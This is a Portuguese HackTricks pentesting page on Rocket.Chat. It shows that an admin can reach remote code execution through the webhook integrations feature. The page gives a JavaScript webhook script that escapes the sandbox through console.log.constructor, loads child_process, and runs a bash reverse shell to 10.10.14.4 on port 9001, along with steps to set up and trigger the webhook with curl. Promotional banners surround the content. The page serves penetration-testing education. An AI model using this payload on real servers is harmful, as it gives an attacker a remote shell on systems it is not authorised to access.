hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

Rocket Chat

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud.

{% endhint %}

{% embed url="https://websec.nl/" %}

RCE

Se você for admin dentro do Rocket Chat, pode obter RCE.

• Vá para Integrações e selecione Nova Integração e escolha qualquer uma: Incoming WebHook ou Outgoing WebHook.
• /admin/integrations/incoming

• De acordo com a documentação, ambas usam ES2015 / ECMAScript 6 (basicamente JavaScript) para processar os dados. Então, vamos obter um rev shell para javascript como:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

• Configure o WebHook (o canal e a postagem como nome de usuário devem existir):

• Configure o script do WebHook:

• Salve as alterações
• Obtenha a URL do WebHook gerada:

• Chame-o com curl e você deve receber o rev shell

{% embed url="https://websec.nl/" %}

{% hint style="success" %} Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Confira os planos de assinatura!
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe truques de hacking enviando PRs para o HackTricks e HackTricks Cloud repositórios do github.

{% endhint %}